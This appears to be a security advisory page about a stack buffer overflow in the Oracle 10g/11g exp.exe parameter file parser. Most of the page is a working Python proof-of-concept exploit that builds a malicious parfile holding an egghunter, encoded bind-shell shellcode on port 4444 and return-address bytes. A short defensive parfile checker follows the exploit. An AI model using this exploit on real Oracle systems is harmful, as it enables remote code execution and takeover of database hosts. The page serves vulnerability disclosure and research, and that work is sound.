
Oracle Database "exp.exe" Parameter File Remote Buffer Overflow Vulnerability

Source: Internet  Published: 2017-03-29



Release date: 2011-02-15
Updated: 2011-02-15

Affected systems:
Oracle 10g
Oracle 11g
Description:
--------------------------------------------------------------------------------
BUGTRAQ ID: 46376

Oracle Database is a relational database management system from Oracle Corporation.

Oracle Database has a remote stack buffer overflow vulnerability when validating user-supplied data. An attacker can exploit it to execute arbitrary code in the affected application or to cause a denial of service.

The vulnerability is in the parsing of the "file" field of the parameter file (parfile) specified on the command line of the Oracle export utility (exp.exe).


Test method:
--------------------------------------------------------------------------------

Warning

The following program (method) may be offensive in nature and is provided only for security research and teaching. Users bear the risk themselves!

Steven Seeley (seeleymagic@hotmail.com) provided the following test method:

#!/usr/bin/python
# Oracle 10/11g exp.exe - param file Local Buffer Overflow PoC Exploit
# Date found approx: 9/3/2010
# Software Link: http://www.oracle.com/technology/products/database/oracle10g/index.html
# Version: 10.x and 11g r1 (r2 untested)
# Tested on: Windows XP SP3 En
# Usage:
# $ORACLE_HOME\exp.exe system parfile=overflow_oracle_exp.txt
# (Python 2 script: strings are raw bytes, as in the original)

def banner():
    print "\n\t| ------------------------------------- |"
    print "\t| Oracle exp.exe code execution explo!t |"
    print "\t| by mr_me - net-ninja.net ------------ |\n"

# parfile prefix; decodes to "indexes=n\r\nlog=results.txt\r\nfile="
# so everything appended after it becomes the value of the "file" field
header = ("\x69\x6E\x64\x65\x78\x65\x73\x3D\x6E\x0D\x0A\x6C\x6F\x67\x3D\x72\x65\x73\x75"
"\x6C\x74\x73\x2E\x74\x78\x74\x0D\x0A\x66\x69\x6C\x65\x3D")

# aligned to edx
egghunter= ("JJJJJJJJJJJJJJJJJ7RYjAXP0A0AkAAQ2AB2BB0BBABXP8ABuJIQvK1"
"9ZKO6orbv2bJgr2xZmtnulfePZPthoOHbwFPtpbtLKkJLo1eJJloPuKW9okWA");

# bind shell on port 4444, alpha3 encoded and aligned with edi
sc = ("hffffk4diFkDwj02Dwk0D7AuEE4n07073K023H8O8L4t8O1M0z110q160q150e2N0n7K0i1K130"
"J0g0i1400110t16090y150r0V122l0s080o0y0r2M0s13150r122k0t0W0q2M0e0v0t0a0s110q000p1"
"P0h2m0j0A0s0q0z7m1M2x1N1N142G1N7l0t0r1N2F1O061O7m1M121O010g0x0i1K0f04130t107p180"
"10t2y0s2Z0j130w7p1P7l0g051P2N1N08191N147k0q1K0h7o0d2r0b2I122F1N2I1N130c2Z0d2Z187"
"l0d2F0i2l122H1O2o122l1M1M2k191K180o2N1L020g05112o1N2j1M121P0w112k1K2F1O2k1N0y121"
"90e0w0r2M0r7m0g2J1O100h2I0e0r0c0r1P7o1O0x117k0i0v1P0z147o0z060e7m0s7K102A1O0p100"
"90e7k0y2y2o2B162A0r1K0p2q0d2m1M2o0s0z1M1O0w150y0v0c2I132Z0i190t2F0g2D182F0u7l0q2"
"O0x120y0p0f2l0a7N17130w7N0i0c0t030b2t1N2F172u1N0p0z2M0c2O1O2n162J0g2D0g0x142k122"
"k112E0g0u0u2O0v1912120g2M0d0v1N191L0r0f2D1N131O121O0y0c2E0u0z1N0y1O7p14170z2O1O1"
"50g0s0y7M1N7m0a0u122N0d170t120a101M2I1L1416001L1K0a1L1O2H0z000e7m1M151M010r2N0u2"
"D0g190d2l0t0s142K0w2j142F157m1O2A1M2Z0g2z0a2N0p111500170r122B182H1N030x2z0v7l1K0"
"x0f2M0g7m1L0q0e2J0x2E1M7o1119100q0w1414101O021L0z161O0z2H1M7k0r001L7n0g7p1M2j1L0"
"u1714157m1N191M2Z14041N2M0v2E19140f2H0e7l1O021L2o0d1915010t0p15061O041M7p1K130g0"
"t1L2s172A1M0p17030w191O2O1O110d0w1M141M7m117p0f070t1716020w0q0f040f09182C1L7p0f2"
"C0b170d1N0c1M1L7n1O191N2E162E0d7m0h0w1N2C0q061M2m1M2j1K0g1M010e13127p1O7n0f130b7"
"p1K120i130u2D0b1M0x110z2L0x2n0v2C0g2H1N0w0y2C1P1M1M2N0f0w0f2j1O2O1M7n0u02172k150"
"7140x0d0s141N0v2F0b2l152E0u03142o0t0v1N2n1M080f2K0x2m1L2k110c1M2l141M1N171M050f2"
"L1M2j1O0213051N2l1M020i180r7n1N0w190q1L7l14101N171L0q0e2H1O011M0311121O7N1K2O1N2"
"C16060d1M1M161M2K1N0u1M2N01VTX10X41PZ41H4A4K1TG91TGFVTZ32PZNBFZDWE02DWF0D71DJEJN"
"0I673K0L3N8O8L5D8O131J171A161A151T7N6N7K1Y15121J1W6O1510111D17191I151C1W17LL1E68"
"6O1I1C7M1C1M151C13LK1E1W1GLK1U1G1E1Q1C116P106P1Q1YLM6K1A1C1A1KLL1L691N1K1J171O7Z"
"1B1B1H161N161NLL1H121N111W161Y1K1W15131E1N1019101E691BLL64151F601QLM1V141Q7N1O18"
"191N127J6P1K6N7O1T631S681L161H181O131R7Z1U7Z19LM7O171YLM161Y1OLO12191M13181I1K19"
"6O681M141V1511191M1J1M131Q1G117Z10171OLN1N1I12181T1G1C7M1C1C1V7J1O101Y681T1C1S1B"
"1QLN1O16171K1Y1G1Q1K15LN1N1F1TLLLMLM161O1O1F11181T1K1I681D1317601C1J6P601QLM1MLN"
"1B1J1M1O1G151I6P1S18157K1Y191B101W1419661A1M6P7N1L1C1ILN1U1L1Q68141B1G7O1Y1S1E12"
"1W641O6712651N1A11LL1T141L1O177J69151W1L177J12LK1O151W1E1F1J1F19121L1T1N1T161N19"
"1L1C1P141J1E1O131N1O1R641D1J1N1I1L1F14141ILO1O151W1B1I7L1OLM1Q1E177O1T1L1G1C1Q10"
"13LL1L1417101L1K1Q1M1N691K101TLL1H151L101D101D651R191TLL1D1C157J1C1K156714LL1N61"
"1L7Z1W7K7JLO6P11141N171D141219681O121H7K1GLM1K1I7MLL1V191M111T7K131411111JLO101G"
"1D7Z14101N141L1K171N1K691K7K1C101H1O1TLK1N1K1L1D131E14LL1N181K7J101E1O6818151914"
"68191TLM1N121LLO1T1914111D6P14161I621L601H1B1W1B1I1216611M6P16151D1O1N7O1L1A1T1F"
"1I1D1L1917111P661A1617161G101W147J1719601O101W631S1A1T1M1SLL1MLN1O181O6517651ULL"
"1Y1F1O661E1F1MLL1I1K1K1R1I1A1U1313611N1E68121S671H1I1Y101F151R1L1M111L1B1K1O1G63"
"1V7L1N1D1L121P1M13LN1V191U1J1N7O1LLN1D1114LN1417141H1T1C14101G651QLO14651D1C14LO"
"1D1F1NLN1L191W7M1K1M1LLO11651MLL141L1N161L131W7M1I1K1N1312151NLL1L121YLK1D181N1G"
"191B1MLO1J101N171L1A1T681N101L1311131O7O10LO1O6317161T1H1H171L7K1NLN1L7M01WWYA44"
"44444444QATAXAZAPA3QADAZABARALAYAIAQAIAQAPA5AAAPAZ1AI1AIAIAJ11AIAIAXA58AAPAZABAB"
"QI1AIQIAIQI1111AIAJQI1AYAZBABABABAB30APB944JBJKKS0YJKKU9XJXKOKOKO0O0I0I0I0I0I0I0"
"Q0Z0V0T0X0603000V0X0411000B060H0H000B03000B0C0V0X020B0D0B0H041102110D00110D0T0B0"
"D0Q0B00110D110V0X040Z080B0D0J0O0M0N0O0L060K0N0O0D0J0N0I0O0O0O0O0O0O0O0B0V0K0X0N0"
"V0F020F020K080E0D0N0C0K0X0N0G0E0P0J0W110P0O0N0K080O040J110K0X0O0U0B0R11000K0N0C0"
"N0B0S0I0T0K080F0S0K0X11000P0N11030B0L0I090N0J0F0X0B0L0F0W0G00110L0L0L0M0P11000D0"
"L0K0N0F0O0K030F0U0F0B0J0B0E0W0C0N0K0X0O0U0F0R110P0K0N0H060K0X0N0P0K040K0H0O0U0N1"
"111000K0N0C000N0R0K0H0I080N060F0B0N11110V0C0L110C0B0L0F0F0K0H0B0T0B030K0X0B0D0N0"
"P0K080B0G0N110M0J0K0H0B0T0J0P0P050J0F0P0X0P0D0P0P0N0N0B050O0O0H0M110S0K0M0H060C0"
"U0H0V0J060C030D030J0V0G0G0C0G0D030O0U0F0U0O0O0B0M0J0V0K0L0M0N0N0O0K0S0B0E0O0O0H0"
"M0O050I0H0E0N0H0V110H0M0N0J0P0D000E0U0L0F0D0P0O0O0B0M0J060I0M0I0P0E0O0M0J0G0U0O0"
"O0H0M0C0E0C0E0C0U0C0U0C0E0C040C0E0C040C050O0O0B0M0H0V0J0V11110N050H060C050I08110"
"N0E0I0J0F0F0J0L0Q0B0W0G0L0G0U0O0O0H0M0L060B01110E0E050O0O0B0M0J060F0J0M0J0P0B0I0"
"N0G0U0O0O0H0M0C050E050O0O0B0M0J060E0N0I0D0H080I0T0G0U0O0O0H0M0B0U0F050F0E0E050O0"
"O0B0M0C0I0J0V0G0N0I070H0L0I070G0E0O0O0H0M0E0U0O0O0B0M0H060L0V0F0F0H060J0F0C0V0M0"
"V0I080E0N0L0V0B0U0I0U0I0R0N0L0I0H0G0N0L060F0T0I0X0D0N110C0B0L0C0O0L0J0P0O0D0T0M0"
"20P0O0D0T0N0R0C0I0M0X0L0G0J0S0K0J0K0J0K0J0J0F0D0W0P0O0C0K0H0Q0O0O0E0W0F0T0O0O0H0"
"M0K0E0G050D051105110U11050L0F110P1105110E0E05110E0O0O0B0M0J0V0M0J0I0M0E000P0L0C0"
"50O0O0H0M0L0V0O0O0O0O0G030O0O0B0M0K0X0G0E0N0O0C080F0L0F060O0O0H0M0D0U0O0O0B0M0J0"
"60O0N0P0L0B0N0B060C0U0O0O0H0M0O0O0B0M0ZKPA")

# align edx
# MOV EDX,ESP
# SUB EDX,64
# SUB EDX,64
# SUB EDX,64
# SUB EDX,32
# SUB EDX,64
# JMP EDX
align = ("\x8b\xd4\x83\xea\x64\x83\xea\x64\x83"
"\xea\x64\x83\xea\x32\x83\xea\x64\xff\xe2\x43")

exploit = header
exploit += "\x43" * 39
exploit += align
exploit += egghunter
exploit += "\x41" * (533-len(exploit))
exploit += "\xe9\x2a\xfe\xff\xff"
exploit += "\xbb\x8b\xe2\x61"
exploit += "\xeb\xf5"
exploit += "\x41" * 100
exploit += "\x57\x30\x30\x54" * 2   # "W00TW00T": the tag the egghunter above searches for
exploit += sc
exploit += "\x43" * (6000-len(exploit))
exploit += ".dmp"                   # the whole value still ends like an export file name
banner()
print ("[+] Shellcode byte size: %s" % (len(sc)))
print ("[+] Writing %s bytes of exploit code to param file" % (len(exploit)))
# binary mode so the \x0D\x0A separators and raw bytes are written unchanged on Windows
pwnfile = open('overflow_oracle_exp.txt','wb')
pwnfile.write(exploit)
pwnfile.close()
print "[+] Exploit overflow_oracle_exp.txt file created!"
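As an added defensive example (not part of the advisory and not Steven Seeley's PoC), the Python 3 checker below parses an exp parameter file the way the advisory describes it, as KEY=VALUE lines separated by CRLF, and rejects it before it ever reaches exp.exe when the `file=` value (or any other value) is longer than a file name ever needs to be or contains non-printable bytes. The 260-byte limit, the function names and the two sample parfiles are constructed assumptions, not values taken from the advisory.

```python
#!/usr/bin/env python3
"""Audit an Oracle exp parameter file (parfile) before handing it to exp.exe.

Added example, not part of the advisory or of the PoC. It checks the field the
advisory names ("file=") and every other KEY=VALUE line for lengths and byte
values that a legitimate parfile never needs. The length limit is an assumption.
"""
import string

# Assumption: a real export file name fits inside a Windows path (MAX_PATH is
# 260); anything longer is treated as suspicious rather than passed through.
MAX_VALUE_LEN = 260

# Bytes a parfile value legitimately contains: printable ASCII plus whitespace.
PRINTABLE = set(bytes(string.printable, "ascii")) - {0x0B, 0x0C}


def parse_parfile(data: bytes):
    """Split raw parfile bytes into (line_no, key, value) tuples.

    Lines are separated by \\r\\n or \\n (the PoC writes \\r\\n). Blank lines are
    skipped; lines without '=' are returned with key=None so the caller flags them.
    """
    entries = []
    for no, raw in enumerate(data.replace(b"\r\n", b"\n").split(b"\n"), start=1):
        if not raw.strip():
            continue
        key, sep, value = raw.partition(b"=")
        if not sep:
            entries.append((no, None, raw))
        else:
            entries.append((no, key.strip().lower().decode("ascii", "replace"),
                            value.strip()))
    return entries


def audit_parfile(data: bytes, max_len: int = MAX_VALUE_LEN):
    """Return a list of (line_no, reason) findings; an empty list means the file passed."""
    findings = []
    for no, key, value in parse_parfile(data):
        if key is None:
            findings.append((no, "line is not KEY=VALUE"))
            continue
        if len(value) > max_len:
            findings.append((no, f"{key}= value is {len(value)} bytes (limit {max_len})"))
        bad = sorted({b for b in value if b not in PRINTABLE})
        if bad:
            hexes = ", ".join("0x%02x" % b for b in bad[:8])
            findings.append((no, f"{key}= contains non-printable bytes: {hexes}"))
    return findings


# Constructed samples (not from the page). The second uses the same three keys
# the PoC writes, with an oversized file= value and two non-printable filler bytes.
BENIGN_PARFILE = b"indexes=n\r\nlog=results.txt\r\nfile=hr_export.dmp\r\n"
OVERSIZED_PARFILE = (b"indexes=n\r\nlog=results.txt\r\nfile="
                     + b"A" * 6000 + b"\x00\x90" + b".dmp")

if __name__ == "__main__":
    for name, sample in (("benign", BENIGN_PARFILE), ("oversized", OVERSIZED_PARFILE)):
        findings = audit_parfile(sample)
        print(f"{name}: {'OK' if not findings else 'REJECT'}")
        for no, reason in findings:
            print(f"  line {no}: {reason}")
```

The check is deliberately independent of exp.exe's own parser: it only decides whether a parfile looks like something an administrator wrote, so it can sit in a wrapper script or a pre-commit hook for export jobs without knowing the exact buffer size the vulnerable build uses.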

Recommendations:
--------------------------------------------------------------------------------
Vendor patch:

Oracle
------
The vendor has not yet released a patch or upgrade. Users of this software are advised to monitor the vendor's home page for the latest version:

http://www.oracle.com
